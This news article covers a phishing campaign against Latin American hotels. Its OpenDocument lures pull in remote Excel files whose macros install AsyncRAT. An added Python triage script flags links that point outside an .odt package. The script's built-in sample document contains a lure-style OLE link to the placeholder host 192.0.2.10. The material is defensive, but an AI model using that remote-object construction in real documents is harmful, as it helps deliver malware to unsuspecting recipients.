Security experts recently discovered hackers on a particularly covert mission to compromise hotels in Latin America using OpenDocument text files.
The unknown attackers are using a rarely seen phishing method that seems to work well so far: less than two weeks ago, none of the antivirus engines on VirusTotal flagged the malicious files as suspicious.
The campaign itself has also raised a number of questions due to some unique features and traits that set it apart from others.
Cybersecurity researchers at HP Wolf Security said they saw a phishing campaign that distributed OpenDocument text files (.odt) in late June 2022. OpenDocument is an open, vendor-neutral file format and the most widely used alternative to Microsoft's Office formats; it is supported by most productivity programs, including Microsoft Word, LibreOffice Writer and Apache OpenOffice Writer.
These files were distributed via email to hotels in Latin America and were presented as guest registration documents.
If the victim downloads and opens the file, they are prompted to "update fields with references to other files". The researchers describe the prompt as a "cryptic message" and say that if the victim confirms, an Excel file is opened.
The Excel file then prompts the user to enable macros, which is where the real problem begins, as enabling macros starts the infection chain. The end result is that AsyncRAT, a remote access trojan, is installed on the victim's machine. AsyncRAT is described as a RAT that allows threat actors to remotely monitor and control infected endpoints over an encrypted connection.
This campaign is particularly covert because analysis of the OpenDocument does not reveal any hidden macros, the researchers say. However, the document does refer to Object Linking and Embedding (OLE) objects, which are hosted remotely.
The document was found to reference nearly two dozen other documents which, when downloaded and opened, contain embedded Excel spreadsheets, each prompting the user to enable macros.
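Because the lure carries no macros, a macro scanner alone will not flag it; what gives it away is the links to objects outside the document package. An OpenDocument file is a ZIP archive whose content.xml describes embedded objects with draw:object / draw:object-ole elements whose xlink:href normally points inside the package (e.g. "./Object 1"). The following added triage script (not part of HP Wolf Security's report or tooling) unpacks an .odt in memory and lists every object, image or linked section whose href leaves the package. The sample document it builds is constructed for the example; the hostname 192.0.2.10 and file name guest.xls are placeholders, not indicators from the real campaign.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Namespaces from the OASIS OpenDocument 1.2 schema
NS = {
    "office": "urn:oasis:names:tc:opendocument:xmlns:office:1.0",
    "text": "urn:oasis:names:tc:opendocument:xmlns:text:1.0",
    "draw": "urn:oasis:names:tc:opendocument:xmlns:drawing:1.0",
    "xlink": "http://www.w3.org/1999/xlink",
}
XLINK_HREF = "{%s}href" % NS["xlink"]

# Elements whose xlink:href may pull content from outside the package
LINKING_TAGS = {
    "{%s}object" % NS["draw"],
    "{%s}object-ole" % NS["draw"],
    "{%s}image" % NS["draw"],
    "{%s}plugin" % NS["draw"],
    "{%s}section-source" % NS["text"],
}


def is_remote(href: str) -> bool:
    """True when an href does not stay inside the ODF package.

    In-package references are relative paths ("./Object 1", "Pictures/x.png").
    Anything with a URL scheme (http, https, ftp, smb, file, ...) or a UNC
    prefix is fetched from elsewhere and should be treated as suspicious.
    """
    if href.startswith("\\\\") or href.startswith("//"):
        return True
    return urlparse(href).scheme != ""


def find_external_links(odt_bytes: bytes) -> list:
    """Return (element-name, href) pairs for every link leaving the package.

    Scans content.xml and styles.xml; both may carry draw:frame content.
    """
    found = []
    with zipfile.ZipFile(io.BytesIO(odt_bytes)) as zf:
        for part in ("content.xml", "styles.xml"):
            if part not in zf.namelist():
                continue
            root = ET.fromstring(zf.read(part))
            for el in root.iter():
                if el.tag in LINKING_TAGS:
                    href = el.get(XLINK_HREF)
                    if href and is_remote(href):
                        found.append((el.tag.split("}")[1], href))
    return found


def build_sample_odt() -> bytes:
    """Constructed test document, not the real lure: one legitimate in-package
    object plus one OLE object that would be fetched over HTTP on open."""
    content = (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<office:document-content xmlns:office="%(office)s" xmlns:text="%(text)s" '
        'xmlns:draw="%(draw)s" xmlns:xlink="%(xlink)s">\n'
        " <office:body><office:text>\n"
        "  <text:p>Guest registration</text:p>\n"
        '  <text:p><draw:frame draw:name="Object1">'
        '<draw:object xlink:href="./Object 1"/></draw:frame></text:p>\n'
        '  <text:p><draw:frame draw:name="Object2">'
        '<draw:object-ole xlink:href="http://192.0.2.10/guest.xls"/></draw:frame></text:p>\n'
        " </office:text></office:body>\n"
        "</office:document-content>\n"
    ) % NS
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        # ODF convention: "mimetype" is the first entry and is stored uncompressed
        zf.writestr("mimetype", "application/vnd.oasis.opendocument.text",
                    compress_type=zipfile.ZIP_STORED)
        zf.writestr("content.xml", content.encode("utf-8"),
                    compress_type=zipfile.ZIP_DEFLATED)
    return buf.getvalue()


if __name__ == "__main__":
    for tag, href in find_external_links(build_sample_odt()):
        print(f"external {tag}: {href}")
```

Run against a real file by replacing build_sample_odt() with the bytes of the .odt; any http/https or UNC href reported is content the office suite would try to fetch when the user accepts the "update" prompt, which is exactly the behaviour this campaign relies on.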
The researchers seem a bit baffled by this approach, as the purpose of “so many duplicate files” remains unclear.
"Documents coming from outside an organization should always be treated with suspicion, especially if they're trying to load external content from the Internet – but in practice, this isn't always easy advice to follow, especially in industries that rely on the exchange of electronic documents between suppliers and customers," concludes HP Wolf Security.